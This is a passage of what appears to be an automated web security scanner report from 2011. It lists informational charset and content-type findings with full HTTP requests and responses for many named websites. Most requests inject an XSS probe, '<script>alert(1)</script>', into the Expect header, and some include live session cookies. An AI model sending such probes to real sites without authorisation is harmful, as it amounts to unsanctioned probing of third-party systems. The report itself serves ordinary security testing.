Connection: keep-alive

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.7.46</center>
</body>
</html>

29.335. http://www.zumie.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zumie.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.zumie.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:08:28 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

30. HTML uses unrecognised charset  previous  next
There are 8 instances of this issue:

Issue background

Applications may specify a non-standard character set as a result of typographical errors within the code base, or because of intentional usage of an unusual character set that is not universally recognised by browsers. If the browser does not recognise the character set specified by the application, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


30.1. http://www.7k7k.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.7k7k.com
Path:   /favicon.ico

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.7k7k.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 404 Not Found
Server: FC
Date: Wed, 04 May 2011 03:59:51 GMT
Content-Type: text/html
Content-Length: 432
Powered-By-ChinaCache: MISS from USA-DA-1-3H2
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML><HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=gb2312">
<TITLE>.......
...[SNIP]...

30.2. http://www.china.org.cn/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.china.org.cn
Path:   /favicon.ico

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.china.org.cn
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 404 Not Found
Server: FC
Date: Wed, 04 May 2011 01:59:13 GMT
Content-Type: text/html
Content-Length: 432
Powered-By-ChinaCache: MISS from USA-DA-1-3H2
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML><HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=gb2312">
<TITLE>.......
...[SNIP]...

30.3. http://www.gougou.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.gougou.com
Path:   /favicon.ico

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gougou.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Wed, 04 May 2011 02:16:48 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 3932
Last-Modified: Fri, 21 Jan 2011 14:58:18 GMT
Expires: Wed, 04 May 2011 04:16:48 GMT
Cache-Control: max-age=7200
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-Type" content="text/html;charset=GBK"/>
   <title>
...[SNIP]...

30.4. http://www.koreatimes.co.kr/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.koreatimes.co.kr
Path:   /favicon.ico

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.koreatimes.co.kr
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 03:06:05 GMT
Content-Length: 1466
Content-Type: text/html
Server: WWW Server/1.1
X-Powered-By: ASP.NET

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>........ .... .. .........</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=ks_c_5601-1987">
<STYLE type="text/css">
...[SNIP]...

30.5. http://www.kukinews.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.kukinews.com
Path:   /favicon.ico

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kukinews.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 1466
Content-Type: text/html
Server: Microsoft-IIS/6.0
Date: Wed, 04 May 2011 04:07:01 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>........ .... .. .........</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=ks_c_5601-1987">
<STYLE type="text/css">
...[SNIP]...

30.6. http://www.se-t.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.se-t.net
Path:   /favicon.ico

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.se-t.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 04 May 2011 00:44:15 GMT
Content-Type: text/html; charset=windows-1251
Connection: keep-alive
Keep-Alive: timeout=5
Set-Cookie: was=true; expires=Wed, 31-Dec-2014 21:00:00 GMT
Content-Length: 7560

<html>
<head>
<title>........ .. .......</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<meta name="keywords" content="....., ......... ...., ......, ....., ......., ........, .......... .. .......">
...[SNIP]...

30.7. http://www.singtao.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.singtao.com
Path:   /favicon.ico

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.singtao.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Length: 1379
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:33:34 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>.......o......</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Big5">
<STYLE type="text/css">
...[SNIP]...

30.8. http://www.vindictuswiki.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.vindictuswiki.com
Path:   /favicon.ico

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.vindictuswiki.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Retry-After: 0
Content-Type: text/html; charset=utf-8
X-Guru-Meditation: 2098305186
X-Guru-Status: 417
X-Guru-Response: Expectation Failed
Content-Length: 1521
Date: Wed, 04 May 2011 03:28:41 GMT
Connection: close
X-Cache-Hits: -1
X-Req: 2098305186
X-URL: /favicon.ico


       <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
           <head>
               <meta http-equiv="Content-Type" content="text/html; charset=utf8" />
               <title>Curse Network - Unexpected Error</title
...[SNIP]...

31. Content type incorrectly stated  previous  next
There are 246 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


31.1. http://4qinvite.4q.iperceptions.com/1.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://4qinvite.4q.iperceptions.com
Path:   /1.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /1.aspx?sdfc=71df608f-34559-82b736ed-60a6-4287-9b07-d98b8154b483&lID=1&loc=4Q-WEB2 HTTP/1.1
Host: 4qinvite.4q.iperceptions.com
Proxy-Connection: keep-alive
Referer: http://www.hertzfurniture.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:14:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Srv-By: 4Q-INVITE2
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=xcxc5da2w0ow0f450zfdsirf; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 1073

var sID= '34559'; var sC= 'IPE34559'; var brow= 'AppleMAC-Safari'; var vers= '5.0'; var lID= '1'; var loc= '4Q-WEB2'; var ps= 'sdfc=71df608f-34559-82b736ed-60a6-4287-9b07-d98b8154b483&lID=1&loc=4Q-WEB
...[SNIP]...

31.2. http://4qinvite.4q.iperceptions.com/trackimage.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://4qinvite.4q.iperceptions.com
Path:   /trackimage.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain a JPEG image.

Request

GET /trackimage.aspx?studyID=34559&langID=1 HTTP/1.1
Host: 4qinvite.4q.iperceptions.com
Proxy-Connection: keep-alive
Referer: http://www.hertzfurniture.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=imez4q55xb44ke45laylrw55

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:14:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Srv-By: 4Q-INVITE2
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html
Content-Length: 1942

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

..........................................................................................................@.<..
...[SNIP]...

31.3. http://api.twitter.com/1/statuses/user_timeline.json  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/statuses/user_timeline.json

Issue detail

The response contains the following Content-type statement:The response states that it contains JSON. However, it actually appears to contain plain text.

Request

GET /1/statuses/user_timeline.json?screen_name=BurtGoldman&callback=TWTR.Widget.receiveCallback_1&include_rts=true&count=5&since_id=63896105380876289&refresh=true&clientsource=TWITTERINC_WIDGET&1304488443301=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/blog/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=130314166807091166; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.551233229.1303561994.1303561994.1303568398.2; k=173.193.214.243.1304470443436909; original_referer=ZLhHHTiegr%2FtFJS817TPehDfOh7Oz%2FB4ymznqD0OvVyy7XSdf6Js7w%3D%3D; _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCEpWf7gvAToHaWQiJTdlN2I2MzE4ODRjOTcy%250AMzY1MzIwMjA0MDlmMmI1NWVjIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--399de8b7b122cb87c7fc61183323d7d9f14959c7

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:54:34 GMT
Server: hi
Status: 200 OK
X-Transaction: 1304470474-97534-19108
X-RateLimit-Limit: 150
ETag: "c4496a2500a04acae94431807a040161"-gzip
Last-Modified: Wed, 04 May 2011 00:54:34 GMT
X-RateLimit-Remaining: 90
X-Runtime: 0.01056
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114cafd8234
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: f66f60ea6283dc46cf10a95dedac414d7a6bcc2f
X-RateLimit-Reset: 1304474043
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCEpWf7gvASIKZmxhc2hJQzonQWN0aW9uQ29u%250AdHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoHaWQiJTdl%250AN2I2MzE4ODRjOTcyMzY1MzIwMjA0MDlmMmI1NWVj--e079f2c19c8095339dd5e2a7d8d7360c706d6540; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close
Content-Length: 34

TWTR.Widget.receiveCallback_1([]);

31.4. http://intensedebate.com/remoteVisit.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://intensedebate.com
Path:   /remoteVisit.php

Issue detail

The response contains the following Content-type statement:The response states that it contains a GIF image. However, it actually appears to contain a BMP image.

Request

GET /remoteVisit.php?acct=e2df9b6910383c7e8b7c05e99be5e886&time=1304488444232 HTTP/1.1
Host: intensedebate.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/blog/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 May 2011 00:54:06 GMT
Content-Type: image/gif
Connection: close
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-length: 58

BM:.......6...(..............................................

31.5. http://ping.crowdscience.com/ping.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ping.crowdscience.com
Path:   /ping.js

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain script.

Request

GET /ping.js?url=http%3A%2F%2Fnews.cnet.com%2Fwebware%2F&id=c2e7cdddce&u=mozilla%2F5.0%20(windows%20nt%206.1%3B%20wow64)%20applewebkit%2F534.24%20(khtml%2C%20like%20gecko)%20chrome%2F11.0.696.60%20safari%2F534.24&x=1304490536710&c=0&t=0&v=6522d442e56f04a6&m=0&cp0=LcGErAoOYI4AAGp4RtMAAAIs&cp1=Cg8JIk24ijttAAAASDs HTTP/1.1
Host: ping.crowdscience.com
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/webware/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __csv=6522d442e56f04a6

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:29:04 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7i mod_wsgi/2.7 Python/2.5.2
Set-Cookie: __csv=6522d442e56f04a6; Domain=.crowdscience.com; expires=Tue, 02 Aug 2011 01:29:04; Path=/
Content-Length: 8000
P3P: CP="NOI DSP COR NID DEVa PSAi OUR STP OTC",policyref="/w3c/p3p.xml"
Connection: close
Content-Type: text/plain


(function (){

var cs = CrowdScience;

cs.state = 1; // cs.states.ping_loading;

cs.invitation_beforeShow = function() {};
cs.invitation_afterShow = function() {};

cs.i
...[SNIP]...

31.6. http://s99.mindvalley.us/quantumjumpingcom/media/wp/uploads/2010/08/invisible-anchor1-211x300.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://s99.mindvalley.us
Path:   /quantumjumpingcom/media/wp/uploads/2010/08/invisible-anchor1-211x300.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /quantumjumpingcom/media/wp/uploads/2010/08/invisible-anchor1-211x300.jpg HTTP/1.1
Host: s99.mindvalley.us
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/blog/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:54:02 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Tue, 29 Mar 2011 11:46:05 GMT
ETag: "2608f-11b69-49f9d9af0d940"
Accept-Ranges: bytes
Content-Length: 72553
Connection: close
Content-Type: image/jpeg
X-Pad: avoid browser bug

.PNG
.
...IHDR.......,.....Y..... .IDATx...w......g..{.S..Rw.7A..l`..5*....I..gKl..c.1..F.....MD... ..4.Y.,....-....3s.....&..;....3O;....|...."...B.@"%...2......./...../.D./zU.I'....M.@.L.....2...7
...[SNIP]...

31.7. http://tracking.moon-ray.com/track.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://tracking.moon-ray.com
Path:   /track.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /track.php?mid=1539_7_2&llc=http%3A//www.theamericanmonk.com/members/forgot-password&s=ysv9sd684163c3y&l=www.theamericanmonk.com/members/forgot-password&ti=Members%20-%20Forgot%20Password%20-%20The%20American%20Monk%20-%20Life.%20Enlightened.%20-%20Theamericanmonk.com HTTP/1.1
Host: tracking.moon-ray.com
Proxy-Connection: keep-alive
Referer: http://www.theamericanmonk.com/members/forgot-password
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html
Date: Wed, 04 May 2011 00:55:22 GMT
Connection: Keep-Alive
Set-Cookie: sess_=ysv9sd684163c3y; path=/
Set-Cookie: mr_src=mr_7; path=/
X-Powered-By: PHP/5.2.14
Content-Length: 168

_mrd.cookie='ref_=mr_7;' + _mr_ex + ';'+ 'path=/';_mrd.cookie='vid=206617824;' + _mr_ex + ';' + 'path=/';var _mrTrackLinks = new Array;

                   _mrScanLinks();
               

31.8. http://www.18-yo-teen.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.18-yo-teen.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.18-yo-teen.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:33:31 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.9. http://www.321chat.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.321chat.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.321chat.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:33:47 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.10. http://www.670kboi.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.670kboi.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.670kboi.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:20:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="NON DSP COR OTPa OUR IND OTC"
Content-Length: 69
Content-Type: text/html
Set-Cookie: SiteUserIsBot=0; path=/
Set-Cookie: ASPSESSIONIDQQBRABAA=BNHOIALDDAGEHAJJKBFMKNBA; path=/
Cache-control: private
Set-Cookie: NSC_DjubefmTjuft=ffffffff09021e0745525d5f4f58455e445a4a423660;path=/

<br>Error, file not found: 404;http://www.670kboi.com:80/favicon.ico

31.11. http://www.6ass9.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.6ass9.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.6ass9.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Wed, 04 May 2011 03:41:23 GMT
Content-Type: text/plain
Connection: keep-alive
Last-Modified: Wed, 07 Dec 2005 05:45:41 GMT
ETag: "498fc3-47e-a9980b40"
Accept-Ranges: bytes
Content-Length: 1150

............ .h.......(....... ..... ..................................t..`Pa.acd.m`p.wjz.wjz.jZl._Ua.A@D.CEF.7.8.N/L..................b.................................OST.AFE.;3=.R=S..........]....
...[SNIP]...

31.12. http://www.abacus24-7.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.abacus24-7.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.abacus24-7.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:02:49 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.13. http://www.academicinfo.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.academicinfo.net
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.academicinfo.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 02:04:26 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Last-Modified: Wed, 10 Mar 2010 10:57:16 GMT
Accept-Ranges: bytes
Content-Length: 1406
Cache-Control: max-age=604800
Expires: Wed, 11 May 2011 02:04:26 GMT
Vary: Accept-Encoding

..............h.......(....... ......................................>:..........TQ..............wt..'#................................................................................................
...[SNIP]...

31.14. http://www.activerideshop.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.activerideshop.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.activerideshop.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:00:16 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.15. http://www.adasheriff.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.adasheriff.org
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.adasheriff.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:27:12 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.16. http://www.advocatehealth.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.advocatehealth.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.advocatehealth.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:31:06 GMT
Content-Length: 281


<!--
    Build Date: 12/29/2010 10:47:56 AM
SiteMaker Release: SM7.1

Code created by:
Medseek, Inc.
2028 Village Lane
